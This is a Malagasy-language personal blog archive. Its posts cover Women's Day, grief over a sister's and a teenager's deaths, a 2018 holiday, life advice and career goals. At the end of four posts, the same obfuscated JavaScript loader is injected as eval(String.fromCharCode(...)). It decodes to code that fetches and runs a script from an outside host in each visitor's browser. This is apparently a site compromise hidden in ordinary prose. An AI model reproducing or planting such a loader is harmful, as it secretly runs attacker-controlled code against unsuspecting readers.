Blaogin’ny Namana Serasera weblog

Archive for the 'izaho' Category

Reny, Renibe,Anabavy vehivavy e!

Andron’ny 8 martsa androany, asa raha mbola misy lanjany ihany izany vanim-potoana izany eo @ mpiara monina na tsia. Fa raha tsy nitolona ry Simone Veil sy ny tariny taty Frantsa dia tsy ho tahaka izao ny fomba fiainan’ny vehivavy raha ny eto Frantsa fotsiny no ho resahiko aloha.

Tsy mora ny mitondra tena ho vehivavy, satria na inona na inona no ataonao, dia tsy maintsy hisy hatrany ny kiana ho azonao. nefa mety io ho kiana hanatsarana zavatra, ary mety ho kiana koa fialonana, satria dia tsy miala amintsika olombelona izay fialonana, na fiatsaram-belatsihy izay.

8 mars hoy aho anio dia mihetsika daholo ny fikambanana rehetra mampiseho ny asa vita sy izay ho hatao rehetra, tsy ho tanisaiko fa efa hitanareo eny rehetra eny daholo, (ity moa ahy dia izay tiako apetraka eto).

Mbola tsaroako foana ilay nandika ilay boky “Monologue du vagin” ho @ teny malagasy fa dia fihomehezana ny an’ny troupe des zazavavy ….

Asa manao ahoana re raha vakiana @ malagasy iny boky iny izao e! ho menatra ve ny mpamaky sa ny mpihaino e!, tiako ho hita be ny fihetsiky ny olona izany, Iza re no ho afaka hanao izay miaraka amiko e! ho ataoko izay miaraka @ i Tatisy atsy ho atsy enga anie…..

 

Faly koa aho fa renibenjaza moa izany e… afaka mifanakalo aminy na dia tsy eo akaikiny aza fa afaka manao izany @ alalan’ny téléphone…

afaka mampianatra azy ny fiainana, ho mahaleo tena, tsy hiankina na @ iza na @ iza, hahay hanaiky ny fahasamihafana, hahay hijoro @ heviny ihany koa….

mbola hitohy

Tonga kely ny inspiration androany nahita fa hoe nisara-panambadiana ny mpivay iray izay anisan’ny manan-karena be eto an-tany. Tsy iza izany fa ry BIll sy Melinda Gates, izy ireo moa dia anisan’ny mpanao asa soa maneran-tany ihany koa, ny tiako ho raiketina eto fotsiny dia hoe manana fondation i Melinda, izay miasa betsaka tokoa any Afrika eo amin’ny sehatra ara-pahasalamana, tsy mba sakana ho azy izany hoe misaraka @ vadiny izany na dia efa 27 taona nivadiana ary mety ho efa ho maherin’izay nifaneraserana aza izy mivady ireo. Ny an’ny tatsinanana tokoa dia tsy mba sakana ho an’ny fiaraha miasa ny fisarahana, nanambara mantsy izy ireo fa dia mbola hitohy hatrany ny fiarahan’izy ireo miasa fa ny fiainan-tokan-trano no mijanona hatreo. 

 


598 comments

Fandalovana ny ety an-tany

Tsy hay ny hiteny, vahotra ny lela, fa dia izay no lahatra ary dia ekena satria dia Izy Tompo no nanome, ary Izy ihany koa no maka, isaorana Azy ny 45 taona nomeny anay niarahana niriaria taminy,

Veloma razandriko izany

Izao aho vao miverina mamaky tsara ny soratra teny fampiononana nosoratan’ny tapaka sy namana maro, ka anisan’ny nanohina aho tokoa ity misy rohy ahitana an’i Hoby ity

https://www.facebook.com/groups/108170892853387/permalink/790080881329048/

tena hoe tsy lasa izy fa ohatran’ny hoe mbola ho avy hihira na hiantso ahy hanontany hoe ahoana nety ve ny poziko, dia ho avy aho hamaly hoe ny artiste ve hanontany pozy izany moa fa izay ataony eo dia mety foana, hihihi misy mpankafy foana iny na pataloha rovitra aza anaovany….. eeehhhh, tsy misy mpanontany izay intsony aho ity rey olona annn… malahelo ilay zandriko aho izany e!!!


506 comments

Fialan-tsasatra 2018

Miarahaba indray

 

Ela izay tsy nanoratako izay, betsaka anefa ny mila ho raiketina an-tsoratra mba ho tadidiana…….. Mihaino vavaka sy Mamaly vavaka ny Tompo ka deraiko ny Anarany. Mbola tsy mety tapitr’ohatra anefa ny zanak’olombelona fa dia velon-kataka lalandava. Mitady ny tonga lafatra ety an-tany hatrany aloha.

 

Mety diso angamba ny loha teny nataoko io fa raketiko ato fotsiny mba tsy ho adinoko ny zavatra nataoko t@ ity fotoam-pialan-tsasatra 2018 ity.

Niaraka t@ i M Chretien-Payen nisintaka kely aho, nihazo an’i Bretagne izahay ary avy teo dia nijanona tao Ouistreham tany badde Normandia, nahafinaritra ny fotoana niarahana naharitra 10 andro teo ho eo ny nandehanako tany ary 4 tena fotoana mamy tokoa.  Efa fanaonay ihany ny misintaka kely tahaka izao fa ity kosa dia tena sady tsy nisy asa nanelingelina ary tsy nisy fotoana novonjena ka tena izay ilay atao hoe miala sasatra.

Nony tafaverina an-trano moa aho dia anjaran’ilay zanako indray no nandeha. Nihazo irery ny tanindrazana izy, fa dia nampitaintaina tokoa satria dia narary teny am-pisidinana ary nilàna fikarakarana manokana mihintsy, (MCE). Tsy misy atahorana hoy ny cardiologue fa mila fanaraha maso fotsiny rehefa tafaverina. nahitan’ny dr tataka kely moa akaiky ny fony any ‘fissure mitrale) fa dia mbola afaka mitsabo aloha isika izao, tsy misy atahorana ny aminy. Nizotra tsara ihany koa ny fialan-tsasatra nataony tany na dia nanao mazan-doha aza ka niafara t@ aretin-kibo izany. Fady anay mantsy any ny mandeha izany Gastro Pizza e…. resto be zaroa e…. zaria eee…. ny anay dia ny tsotra sy madio ary ara-pahasalamàna ihany hihihihi anatra ho azy tsara izay hihih fay tsara mihintsy niaingitraingitra ka nitsapa ny vokany….

Taty Fr kosa moa dia nihaona daholo ny zanaky ny mpiray tampo @ RAJAONARISON, izay natao tany Liège, nahafinaritra fa dia niaraka nandritry ny WE izahay ary dia nisy koa fiarahana nandeha teny amoron-dranomasina avy teo…..

 

Farany dia andraso aloha rehefa vita sonia dia teneniko kann, hihih aoka aloha izany ho @ herinandro indray ooooeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


61 comments

Fantaro ilay maha ianao anao, sa ve hoe mby aiza ianao?

Ny voalohan-teniko dia hoe toy ny lolo isika, ka afaka miofo, mivoatra ihany koa fa tsy natao ho very fahalalana akory.

Ampahatsiahiviko etoana ilay fomba fisainana milaza hoe :” Avelao ny nofy hanova ny zava-misy fa aza avela kosa ny fiainana no hanova ny nofinao na izay ho kinasanao” Eto dia voalohany aloha dia mila fantarinao hoe “iza tokoa ianao”, satria raha tianao ny hiaina io nofy ho lasa fiainana io dia mila hentitra amin’ny tenanao aloha ianao, mila fantarinao hoe hatraiza no fetra zakanao, tantinao ary hivononanao hatrehina marina tsy amin-tahotra.

Amin’izay fahafantaranao ny tenanao izay dia tsy tokony hisy fetra izay ho kasainao, avelao ny nofinofinao hamaritra hoe iza ilay TOKONY ho ianao , farito, ary raiketro an-tsoratra izany ary ataovy taza-maso matetika, mba ho lasa tarigetra mihintsy aza. Raiketro ao ny vinavinam-piainana tianao hiainana, ny zavatra sahinao hatao nefa tsy vitanao hatreto, na hiova fiainana mihintsy az atsy mampaninona fa fandalovana ihany ny antsika ety koa aleo iainana dieny izao izay nofinofy izay,

Rehefa vitanao izao, dia mivononà hiaina io fiovana io @ izay. Azo atao hoe fiovana na koa fivoarana izy eto, tsy misy hoe fahatarany izany eo @ fanovana fiainana na famindra hoy isika, ny zavatra rehetra dia miainga @ fanapahan-kevitra hentitra. Tongotra mby an-dakana hoy isika izay, ka tsy hiverina aoriana intsony. Mila iainanao @ izay ilay nofinao teo aloha, angony daholo ho eo am-pelantananao ny fahaizana manao izany, manatona olona na tranon’asa ahafahanao mahazo ny ilaina momba izany (raha asa dia mila fanampiana ianao @ “reconversion”, dia mila “formation” vao2 izany), Miova izany eto ny rivotra iainanao indray, Fantaro fa tsy fahalemena akory ny fiovana fa fivoarana kosa, ny traikefanao sisa no andrasana.

Azo ampiharina ihany koa izany eo @ fiainana manokana, ohatra raha mbola mpitovo ianao dia inona no tianao hitondrana ny fiainanao ho avy, hijanona ho mpitovo sa mikasa ny hanorina tokan-trano, ary raha efa manana izany indray dia ny fanontaniana mipetraka dia hoe moa ve manao ny mety sy azo atao aho hahamafy orina ilay voady izay nataoko, sa mila misy ezaka tokony hataoko haha mamy indray ilay ankany, na koa hoe sao tonga @ tsotsory mamba hisarahana ny fiarahanareo. Fanontaniana maro no mibosesika an-doha rehefa tonga ilay fotoana ilaina fandinihan-tena izay, ka tena mila olona vonona ny hiatrika izany tokoa fa tsy manisy saron-tava fotsiny ihany. Eto anefa dia tsy ianao ihany no ho voakasik’ilay fiovana fa ny olona izay miaraka aminao ihany koa, (faire une rétrospective de la vie pour mieux rebondir), ka mila mandinika tsara ianao hoe vonona hiatrika izay fiovana izay tokoa ve.

Rehefa tontosa ireo dingana ireo dia mila mino @ izay ianao. Mino ilay nofy lasa fiainana iainana. Mino fa vitanao tokoa ilay fiovana, mety hisy ny sakana, mety hisy ny tsy ho fahataontosana am-boalohany, fa tsy tokony ho kivy ianao. Hisy; ary enga anie hisy ihany koa ny hitsikera izay fiainanao vao2 izay, aleo hisy izany mba hahaizanao miaro ilay nofinao lasa tena izy. Aza mora ketraka ny @ izany ka hanenina, ny nenina tsy mba eo aloha hobanjinona hananatra fa any aoriana hatrany, koa raiso ny hoavinao ary iaino aam-pifaliana na inona na inona mitranga eo. ianao no efa nisafidy ilay nofy ho fiainana ka anao ny mikolokolo azy hamelana sy handrobona indray.

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


62 comments

Mihamandroso ny taona

Isika ety an-tany dia tsy ho azo iodivirana mihintsy fa tsy maintsy +1 isan-taona ny taonantsika. Ezahana ny ho tojo ny lavitra indrindra , asa moa tsy tsaroako firy taona izao ny olombelona lava andro indrindra eto an-tany. Fa ireto misy torohevitra kely, teny atsipy mba hahalavorary izany fandrosoan’ny taona izany, mba tsy ho adin-tsaina ho antsika izany hoe mitombo indray ny taona, tsy tomombana akory ny ho tanisaiko eto, mety misy tokony ho ampiana na hatsaraina fa ataoko fiandry ato ireto ary ho tsidihiko mandrakariva, ary avelako ho anareo ihany koa:

  1. Manàna fisainana feno hafatoniana sy madio eo @ fiainana (mba hialàna @ stress/ rarin-tsaina lava, hisorohana ihany koa à aretim-bavony mety hanjo)
  2. Aza dia manahy ny @ ho avy (hihihi izaho anefa dia mpitari-bato vilam-bava ggrr) satria hoy tokoa ny baiboly hoe (tsy haiko aiza ho aiza ann) na ny voron-kely aza tsy miasa nefa misy mpiahy
  3. Ezaho ny manao izay zavatra mahafalifaly ny saina sy fo ankoatran’ny asa sy ny andraikitra samihafa
  4. Aza mandainga à tenanao (ny hafa azonao andaingana fa tsy ny tenanao mihintsy satria dia miverina @ ilay n°1 isika,
  5. Ianao ihany no herin’ny tenanao, aza mba miantehitra @ olona hafa mihintsy, raha te hahazo fahafaham-po tanteraka fa ho diso fanantenana ianao
  6. Tiavo ny manodidina anao araka ny fanirianao fa tahaka izay ihany koa ny hitiavan’ireo anao
  7. Mitiava tsy misy tambiny
  8. Mianàra mamela heloka, (ppfff mpitari-bato vilam-bava hatrany ny aty…) aza entina masoandro maty ny hatezerana
  9. Aza manaratsy mihintsy ny tenanao, ilaina ny fahamatorana fa mba mila mihomehy ny tenanao ihany koa indraindray, fanitsiana ny diso tsy mety mila arenina izay
  10. Aza mitsahatra ny mianatra, fa ny fiainana dia fianarana lalandava (mahatsiaro ilay reniko aho eto….)
  11. Manàna fahatokisana ny tenanao fa izay no andrin’ny ho avinao
  12. isaory lalandava ilay mpahary sy mpandahatra fa izy no naha toy izao anao,

Tarigetrako ireo ary zaraiko aminareo, kofehy mitana ahy tsy ho lavo ihany koa ireo, haiko misy tsy ampy fa ho ampiako miandalana eny ihany.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


32 comments

Sao mahasoa

Inona ny tokony hatao raha te hanana na te hanatratra tanjona ianao:

 

Isika rehatra izao dia mikatsaka ny hahazo tombontsoa eo @ fiainana avokoa, ary vao teraka isika dia misy ilay fomba fitenintsika hoe “samy nosoran-dreniny menaka” daholo. Midika izany fa ny Menaka na solika dia natao hampiodina ny fiainana, natao indrindra koa hampisosa ny fiainana mba tsy hisy rahoraho eo aminy fa hihodina soa ny milina rehetra tsy hisy ny sakana.

Rehefa vita ny fianarana fa tsy ny fanabeazana satria ny fotoana fanabeazana dia tsy mba mety tapitra, fa ny fianarana any an-dakilasy kosa ilay fanovozana na fandratoana fianarana dia mety hisy fetrany ihany, nefa moa raha tiana ny hanohy izany dia mety tsy hisy fetrany ihany koa io, ka hoy aho hoe, rehefa tonga eo @ ilay fotoana hijabahana @ asa fameloman-tena aza ianao dia indreto misy toro-hevitra vitsivitsy mety hahasoa anao.

  1. Voalohany aloha dia ezaho ny hanana tanjona eo @ fiainana. Izany hoe isika rehetra ireto dia tsy miaina fahatany fotsiny ety an-tany, fa samy manana ny diantsika avy nefa dia samy manana lalana ahatongavana @ izay tanjona izay isika, fa ny tena zava-dehibe dia ilaina abaribary izy io aao anaatinao ao hoe ity ny ahy ny tanjoko, ohatra tiako ny hanana zanaka hendry, na koa hanana trano be sy vady tsara, ary asa……(ambition)
  2. Faha roa indray dia tiavo ary aza atao ambanin-javatra ny fitiavana io asanao io fa io no fidiram-bolanao, izany hoe mila ovanao ho fitaovana mihintsy io fitiavanao ny asa fivelomanao io mba tsy ho monamonaina ianao ary tsy halaina rehefa handeha hamonjy azy, ohatran’ny mpifamofo handeha hifamontoana, mangitakitaka ery ary maika ery ny hihaona, ary tokony ho tahaka izay ianao rehefa hiomana ka handeha hamonjy ny asanao. Raha tsy ao am-ponao mantsy ilay fitiavanao ny asanao dia ho diso tetika ianao satria dia ho fati-antoka be ho anao izany, diso planina ianao tsy misy fitiavana tsy misy fankasitrahana io asa io. Omeko ohatra kely ianao, izaho dia fony mbola kilasy faha 5 T5 raha tany Madagasikara  tao @ La Providence Amparibe dia efa fantatro fa hanao dokotera aho, nandeha ny fotoana dia teo à kilasse faha 8 na 4ème dia natahotra aho fa nahita olona nianjera ary tapaka ary hita tety ivelany ny taolany torak’ovitra aho ary teo dia nisinda ny nofinofiko sy ny tanjoko ho dokotera ary vetivety monja dia nahita tanjona ho tratrarina vaovao indray aho dia ny hoe hiasa amina hotely aho tsy mbola fantako na hoe ho mpahandro aho na ho mpandray olona t@ izany fa hoe hanana izay fanomezam-pahasoavana izay aho…. tojo ny tanjoko aho ankehitriny, tratrako izay, mila manatratra tanjona vaovao hafa indray aho izany fa tsy mbola lazaiko anareo aloha…..Ka izay no ataoko hoe io tanjona io dia mety tsy volena fa mety efa ao anatinao ao, ary raha efa ao anatinao ao izy io dia ho mora foana aminao ny hanatateraka izay. (Passion du métier–> bon plan de carrière –>bonheur –> réussite)
  3. Faha telo indray dia ny finiavana ary fahasahiana mandray fanapahan-kevitra henitra eo @ fiainana na aka’asa izany na eo @ fiainana manokana, Tsy mora ny mandray izay andraaikitra izay eo à fiainana nefa raha tianao ny handroso dia tsy misy afatsy ny tenanao ihany no afaka hanampy anao, tsy afaka ny hihaino ny hevitry ny hafa ianao satria tsy ireo no hiaina ny misy anao fa ianao ihany, azonao atao ny mangataka hevitraa fa anjaranao kosa ny mandanjalanja hoe aiza ny lalana mora sy ara-dalàna ahatratrarako ny tanjona tiako ho tratra.(prise de risque)
  4. Ny faha efatra farany dia ny fahaizana mandanjalanja ny toerana misy anao, sy ny ametrahanao anao sy ny manodidina anao, rehefa miasa mantsy isika dia tsy hoe ny asa ihany sisa no misy fa mba jerena ihany koa ny manodidina sao dia lasa andevozin’io asa io indray avy eo ka tsy hahay intsony hametraka ny tena sy ny manodidina @ toerana misy azy avy. Mahaiza misaotra ilay Mpahary fa izy no nanome anao, ny fianakavianao satria izy ireo no miahy anao, ary koa aza atao an-tsirambina ny vatanao fa io no tempolinao, omeo sakafo araa-pahasalamana izy ary taizao @ fanatanjahan-tena araka ny fahafahanao @ fandaharam-potoananao.(l’équilibre)

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


32 comments

Fiaraha mientana

Tsy hita ny hambara……………….. izay no azo hanombohana ity lahatsoratra ity, satria tokoa dia zaza niaraka notaizaina t@ zanaky ny tena no namoy ny ainy ny faha 12 /01/2017 lasa teo tanora vao 15 taona monja. Tsy hay faritana mazava ny antony nandaozany ity fiainana an-tany mamintsika ity, fa ny hany haiko dia kepoka aho, gina tsy nahateny raha vao nolazain’ilay ankizy tato an-trano ny vaovao ratsy.

Ny tadidiko hany naverimberiko tao @ efitra fandroana satria tao ao no naheno ny vaovao ratsy dia ny hoe mba miangatra izao Any Ambony any izao, fa dia nahoana loatra re? nipararetra, nangozohozo ny lohaliko, tsy tsaroako mbamin’ny tokony hataoko akory aza, nivoaka avy tao aho dia nandefa SMS tany @ i Max sy Lydia fa tsy ho sahiko akory na ny haheno ny feon’izy mivady aza. Atao ahoana ny ho eo @ toeran ny olona namoy ain-janaka izany? ‘saika’ efa teo ihany koa aho mantsy ka haiko tsara izany, Tompo ô!  Ianao mahay ny fiainanay, mpandahatra anay, nahoana tokoa reh e!.

Tsy hiditra @ antsipirihiny aho fa dia aleo hijanona ho ahy samy irery izany, fa ny fiaraha mientan’ny mpiara belona kosa dia tsy azoko odiana tsy hita, na teo @ mpiara miangona izany, iny moa dia efa mahazatra anay satria dia tanana havia sy havanana izahay ao am-piangonana na ao @ fiangonana FPMA io na ao à fianfonana CCML, fa dia tsapa tokoa izany firaisan-kina izany, fa dia tonga @ ilay fitenenantsika hoe: ‘voin-kava mahatratra’. Tsy nijanona ho irery tokoa mantsy ny fianakaviana fa dia notronona hatramin’ny fampodiana ny razana hatrany an-tanàna.

Nanomana dia mangina ny fianakaviana ho fanomezam-boninahitra ho azy, ary dia tonga nanotrona izany daholo izay olona akaiky nahafantatra na tsia, azy.

Nisy ihany koa ny fiaraha mientana ara-bola izay natao hampodiana ny razana satria na dia eo aza ny Mutuelle dia nangataka ry zareo mba ho aloha mialoha aloha ny vola vao hamerina ry zareo, nefa manoloana ny vola miavosa atrehana dia mbola nisy ihany koa ireo mahalala tanana eran-tany tonga nanotrona ity fianakaviana namoy ny menaky ny ainy, Tsy ho hay ny tsy hisaotra antsika rehetra ny amin’izany, onera be ny lany ary ho hataon ny fianakaviana ho tsara levenana ny maty Tompoko. Raha 9000€ no nangatahan’ny fianakaviana, dia nihoatra lavitra noho izany no tonga tao amin’ilay fiaraha-mientan’ny mpiara-belona, Ny Tompo, anie hitahy anareo.

Ry zareo moa izany avy any Ambatondrazaka, tany nihavian’ilay nenitoako lasana t@ herintaona ihany koa, i Max dia isan’ny nivezivezy tsy sasatra tany @ hopitaly fony ilay nenitoako tany, ary nony lasana izy dia mbola izy ihany koa no niaraka tamiko nikarakara ny fotoam-pivavahana tao am-piangonana ho fanaovam-beloma farany azy.

Maharary ary fery tsy hikatona intsony ny nilaozan-janaka, ny fotoana anie hanamaivana ny fahabangana raha efa nihatra taminao mpamaky izany.

 

Teny kely natolotro ho faampaherezanaa notsongaiko tao amin’ny baiboly:

  • Salamo 73 , 23 :
    Nefa izaho dia eo aminao ihany mandrakariva, mihazona ny tanako ankavanana Hianao.
    Salamo 73 , 26 :
